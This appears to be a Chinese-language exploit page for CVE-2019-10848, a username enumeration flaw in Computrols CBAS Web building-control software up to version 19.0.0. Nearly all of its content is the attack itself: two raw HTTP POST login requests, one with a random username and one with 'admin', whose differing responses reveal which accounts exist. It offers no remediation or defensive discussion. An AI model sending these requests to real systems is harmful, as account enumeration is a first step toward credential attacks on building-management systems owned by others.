CVE-2019-10848_Computrols_CBAS_Web_用戶名枚舉漏洞

# CVE-2019-10848 Computrols CBAS Web 用戶名枚舉漏洞
==漏洞影響==
19.0.0及以下

==測試無效賬戶==

POST /cbas/index.php?m=auth&a=login HTTP/1.1

username=randomuser&password=&challenge=60753c1b5e449de80e21472b5911594d&response=e16371917371b8b70529737813840c62

Response


randomuser

==測試有效賬戶==

POST /cbas/index.php?m=auth&a=login HTTP/1.1

username=admin&password=&challenge=6e4344e7ac62520dba82d7f20ccbd422&response=e09aab669572a8e4576206d5c14befc5s

Response


Invalid username/password combination. Please try again!

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容